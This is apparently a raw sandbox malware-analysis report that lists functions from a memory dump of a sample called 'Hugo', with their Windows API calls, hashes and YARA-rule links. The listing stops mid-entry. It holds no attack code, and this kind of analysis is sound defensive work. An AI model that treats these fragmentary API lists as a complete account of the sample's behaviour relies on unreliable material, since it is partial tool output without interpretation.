Opcode ID: a0997095f6ec26161a23720d5e928baaeab57a16f7e47adf47fe6371d47fbc2b
Instruction ID: c5e45ec0841997d9782ed550bf35395b48d3dc7f8a5c5ad82641722176d98644
Opcode Fuzzy Hash: a0997095f6ec26161a23720d5e928baaeab57a16f7e47adf47fe6371d47fbc2b
Instruction Fuzzy Hash: D041B232E002049BCB20DF78C881A5DBBF6EF88324F554569E915EB396DA35AD01EB81

Function 00F119CD Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00F119E1
ScreenToClient.USER32(00000000,?), ref: 00F119FE
GetAsyncKeyState.USER32(00000001), ref: 00F11A23
GetAsyncKeyState.USER32(00000002), ref: 00F11A3D

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: eb1336bf1f6f6e09f9e2e271be3f6e975e254ddb00932e6a6f6e74f702051e06
Instruction ID: 2858df987327a6a6376e5c32709509ab502017d8a975c0d0f7e62da6a03efcdd
Opcode Fuzzy Hash: eb1336bf1f6f6e09f9e2e271be3f6e975e254ddb00932e6a6f6e74f702051e06
Instruction Fuzzy Hash: CA418471E0450AFFDF059F68C854BEDBB74FF05375F20421AE929A2290C7346A94EB91

Function 00F842B9 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00F84310
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00F84367
TranslateMessage.USER32(?), ref: 00F84390
DispatchMessageW.USER32(?), ref: 00F8439A
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F843AB

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 6aea4f405d557713ef5317f50760b5a20333f8c68b6408fc5b865949f59b9741
Instruction ID: a51b0fdf82eb73f20637d6ca29f7661611abe5bac3d7bbd46ec2e2a47d1aa807
Opcode Fuzzy Hash: 6aea4f405d557713ef5317f50760b5a20333f8c68b6408fc5b865949f59b9741
Instruction Fuzzy Hash: 4831A470D0438BDEEB78EB74D889BF63BACAB01314F044569D462861A1F7A4B845FF21

Function 00F7224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00F72262
PostMessageW.USER32(00000001,00000201,00000001), ref: 00F7230E
Sleep.KERNEL32(00000000,?,?,?), ref: 00F72316
PostMessageW.USER32(00000001,00000202,00000000), ref: 00F72327
Sleep.KERNEL32(00000000,?,?,?,?), ref: 00F7232F

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 47e45fdccd18ec1258b19c04d06a85551fcdd59fd65e50f7ac5081339a65d30e
Instruction ID: 4c377c376d00bfe1e580c1954bf3979ade78a9a0bf8b2b7e6bbd79f7ce6d2dca
Opcode Fuzzy Hash: 47e45fdccd18ec1258b19c04d06a85551fcdd59fd65e50f7ac5081339a65d30e
Instruction Fuzzy Hash: 3731A471900219EFDB14CFA8CD89ADE3BB5EB05325F10822AF926A72D1C770D954EB91

Function 00F8D95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00F8CC63,00000000), ref: 00F8D97D
InternetReadFile.WININET(?,00000000,?,?), ref: 00F8D9B4
GetLastError.KERNEL32(?,00000000,?,?,?,00F8CC63,00000000), ref: 00F8D9F9
SetEvent.KERNEL32(?,?,00000000,?,?,?,00F8CC63,00000000), ref: 00F8DA0D
SetEvent.KERNEL32(?,?,00000000,?,?,?,00F8CC63,00000000), ref: 00F8DA37

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 64fdcfd816768d404b2d17f4446cf0725c2356bf4182b7feafc4f76e14f1625d
Instruction ID: 2e21c76abacf033e79fc3f1bc9287f3eba70810f048c82020836e84d20701876
Opcode Fuzzy Hash: 64fdcfd816768d404b2d17f4446cf0725c2356bf4182b7feafc4f76e14f1625d
Instruction Fuzzy Hash: 4D315E71904205EFDB24EFA5D885AAFB7F8EF05364B20442EE546D2191DB34EE41EB60

Function 00FA61A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 00FA61E4
SendMessageW.USER32(?,00001074,?,00000001), ref: 00FA623C
_wcslen.LIBCMT ref: 00FA624E
_wcslen.LIBCMT ref: 00FA6259
SendMessageW.USER32(?,00001002,00000000,?), ref: 00FA62B5

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 3a8243f1302c6cf528bb21bc708c3c4b98828f7d940dd5ed3a701072a0b4be9b
Instruction ID: b5198d0ba3596d281cc23d212de70cafa247c2ec0086f2975b9b4d6c71b3836c
Opcode Fuzzy Hash: 3a8243f1302c6cf528bb21bc708c3c4b98828f7d940dd5ed3a701072a0b4be9b
Instruction Fuzzy Hash: 3F2182B1D002189ADF209FA4CC84AEE7BB8EF06734F144216F925EA180E7709985EF50

Function 00F9138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00F913AE
GetForegroundWindow.USER32 ref: 00F913C5
GetDC.USER32(00000000), ref: 00F91401
GetPixel.GDI32(00000000,?,00000003), ref: 00F9140D
ReleaseDC.USER32(00000000,00000003), ref: 00F91445

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: f65c1ef9ebe7f4de9041b6096f5f8e91bd4a128723bac9f43cabc9bdfde0dd2b
Instruction ID: 13ddf3e94eabfcf67d2117e7df93d23339bb50ff4c3e3756e8ef306a1438dd2a
Opcode Fuzzy Hash: f65c1ef9ebe7f4de9041b6096f5f8e91bd4a128723bac9f43cabc9bdfde0dd2b
Instruction Fuzzy Hash: 1B215E76600218AFDB04EF65CC84EAEBBF5EF49340B048479E85A97751DB34AD44EB90

Function 00F4D13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00F4D146
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00F4D169

Part of subcall function 00F43B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00F36A79,?,0000015D,?,?,?,?,00F385B0,000000FF,00000000,?,?), ref: 00F43BC5

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00F4D18F
_free.LIBCMT ref: 00F4D1A2
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F4D1B1

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: ce3d31e51859ada9831f7633a6fe9f1f0d3b634a285499f521102da34b55418b
Instruction ID: 1c3a94ce1eab990631b464536da7b2f21cc789becc0ebe43bd725d2525ef83d1
Opcode Fuzzy Hash: ce3d31e51859ada9831f7633a6fe9f1f0d3b634a285499f521102da34b55418b
Instruction Fuzzy Hash: 8801DFB2A026197F37212ABA9C8CD7B7E6EDFC3BB1314012BFC05C6244DA608C01B1B0

Function 00F76078 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00F7608D
_memcmp.LIBVCRUNTIME ref: 00F760AB
_memcmp.LIBVCRUNTIME ref: 00F760BE
_memcmp.LIBVCRUNTIME ref: 00F760D6
_memcmp.LIBVCRUNTIME ref: 00F760EE

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: f355747e0d45a0239ac3072b46b81066b02d431af32b1b1306c97f7ef56574cc
Instruction ID: 75492a840e1516f17d3697ee6138753aa8ebd8c13908eabd5e82cea8e1deeeb1
Opcode Fuzzy Hash: f355747e0d45a0239ac3072b46b81066b02d431af32b1b1306c97f7ef56574cc
Instruction Fuzzy Hash: 9701B5F2A00B057B961456215C42FEB735DAE503B8F048022FD0DDB241EB65ED10F6A3

Function 00F4316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(0000000A,?,?,00F3F64E,00F3545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00F43170
_free.LIBCMT ref: 00F431A5
_free.LIBCMT ref: 00F431CC
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00F431D9
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00F431E2

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: f5c3fcccca25db707ff1f0ea8d23eb169c2dbf9963849408034c293fd5ab8b02
Instruction ID: 656296f09949bca55f5b4c4d371e46f2db48f943e57483bc3e4a5b7b72101c1b
Opcode Fuzzy Hash: f5c3fcccca25db707ff1f0ea8d23eb169c2dbf9963849408034c293fd5ab8b02
Instruction Fuzzy Hash: 5D01F4B3E416012B961276349C86E2B3E6DAFC13717200436FC2692181EE25CA017121

Function 00F708FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F70831,80070057,?,?,?,00F70C4E), ref: 00F7091B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F70831,80070057,?,?), ref: 00F70936
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F70831,80070057,?,?), ref: 00F70944
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F70831,80070057,?), ref: 00F70954
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00F70831,80070057,?,?), ref: 00F70960

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 74727f1f54d56313f23807ae91acbd433b9166b3b18ec2df4c1e21b9e57617c4
Instruction ID: d48b3e138c2107062a079d3284d04265969291557d6fbffd1e9db9c11264036f
Opcode Fuzzy Hash: 74727f1f54d56313f23807ae91acbd433b9166b3b18ec2df4c1e21b9e57617c4
Instruction Fuzzy Hash: 41018FB2A00208EFEB104F55DC44B9A7BBDEF44761F148125FA0AE2211DB75DD40ABA0

Function 00F7F292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 00F7F2AE
QueryPerformanceFrequency.KERNEL32(?), ref: 00F7F2BC
Sleep.KERNEL32(00000000), ref: 00F7F2C4
QueryPerformanceCounter.KERNEL32(?), ref: 00F7F2CE
Sleep.KERNEL32 ref: 00F7F30A

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: c0807c87eaaae70f1833023811ec1214abafe93566ecb25f70f67316ed77991f
Instruction ID: 50d0b516236ff8cde13c9d092fb23dd831fa9417fa59e97aa2a8926c9ce399d5
Opcode Fuzzy Hash: c0807c87eaaae70f1833023811ec1214abafe93566ecb25f70f67316ed77991f
Instruction Fuzzy Hash: 2F018071C0151DDBDF00AFB4EC49AEDBB79FB09711F004467D506B2251DB309558E7A2

Function 00F71A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F71A60
GetLastError.KERNEL32(?,00000000,00000000,?,?,00F714E7,?,?,?), ref: 00F71A6C
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F714E7,?,?,?), ref: 00F71A7B
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F714E7,?,?,?), ref: 00F71A82
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F71A99

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 6f7d9ec46e1f7c87f40e7d68f7413ee527aa854753ad37a8d0bd942b07230541
Instruction ID: 42d970a8ef7b659802fb4a019a54f0e81372b429f9b604f7ade512021da6725d
Opcode Fuzzy Hash: 6f7d9ec46e1f7c87f40e7d68f7413ee527aa854753ad37a8d0bd942b07230541
Instruction Fuzzy Hash: 130181B5A01309BFEB114F68DC48D6A3B7DFF89364B214415F84AC3360DA31DC41AA60

Function 00F71960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F71976
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F71982
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F71991
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F71998
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F719AE

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 818a35bdc7fa60e1333d3a1bed229a98ad04a8a55c22cd18f1ceff1b62dbb32b
Instruction ID: b66c752dfaf2d0b6491b392a6c2e272b2e9c7d177176c6b82cddda139bcb8f3c
Opcode Fuzzy Hash: 818a35bdc7fa60e1333d3a1bed229a98ad04a8a55c22cd18f1ceff1b62dbb32b
Instruction Fuzzy Hash: C9F062B5600309ABDB314F68EC59F563B7DFF8A7A0F104415FA4AC7251DA70D8019A60

Function 00F71900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F71916
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F71922
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F71931
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00F71938
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F7194E

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: a926b7f264fce8f023d49387dcb32ceb88bfe33c310cb53638a27731553232ab
Instruction ID: 7f9538db4cf5039892e6e6cabab4270379f25068e9f97d61738fc6f2c7d869c6
Opcode Fuzzy Hash: a926b7f264fce8f023d49387dcb32ceb88bfe33c310cb53638a27731553232ab
Instruction Fuzzy Hash: C6F062B5600305ABDB210F69DC4DF563B7DFF8A7A0F104415FA4AD7291DA70DC01AA60

Function 00F80CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,00F80B24,?,00F83D41,?,00000001,00F53AF4,?), ref: 00F80CCB
CloseHandle.KERNEL32(?,?,?,?,00F80B24,?,00F83D41,?,00000001,00F53AF4,?), ref: 00F80CD8
CloseHandle.KERNEL32(?,?,?,?,00F80B24,?,00F83D41,?,00000001,00F53AF4,?), ref: 00F80CE5
CloseHandle.KERNEL32(?,?,?,?,00F80B24,?,00F83D41,?,00000001,00F53AF4,?), ref: 00F80CF2
CloseHandle.KERNEL32(?,?,?,?,00F80B24,?,00F83D41,?,00000001,00F53AF4,?), ref: 00F80CFF
CloseHandle.KERNEL32(?,?,?,?,00F80B24,?,00F83D41,?,00000001,00F53AF4,?), ref: 00F80D0C

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 4a9544285f8ea9ed41bb06a0ae053ddf66dd80d4539784301688f22c82fec029
Instruction ID: 2011802ddce688addba8ccb501999839a48a1b0ae515fff24b84d13fbe259262
Opcode Fuzzy Hash: 4a9544285f8ea9ed41bb06a0ae053ddf66dd80d4539784301688f22c82fec029
Instruction Fuzzy Hash: 6A01A272800B15DFCB30AF66D980856F7F5BF503253158A3ED19752931CBB0A948EF80

Function 00F765AB Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00F765BF
GetWindowTextW.USER32(00000000,?,00000100), ref: 00F765D6
MessageBeep.USER32(00000000), ref: 00F765EE
KillTimer.USER32(?,0000040A), ref: 00F7660A
EndDialog.USER32(?,00000001), ref: 00F76624

Memory Dump Source

Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true

Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 942707288773f1ca5215e7d2f40f259126d09eb29a71f1645f2975fb18dd7d7a
Instruction ID: 9d1551fed310fe442202cdb7c59b9db8c33c0536abcac3434947b4c5b1e999cb
Opcode Fuzzy Hash: 942707288773f1ca5215e7d2f40f259126d09eb29a71f1645f2975fb18dd7d7a
Instruction Fuzzy Hash: 95018670900708ABEB245F10DD4EBD67B78FF01715F44465AB187A14E1DBF4AA44AA51

Function 00F4DABA Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00F4DAD2

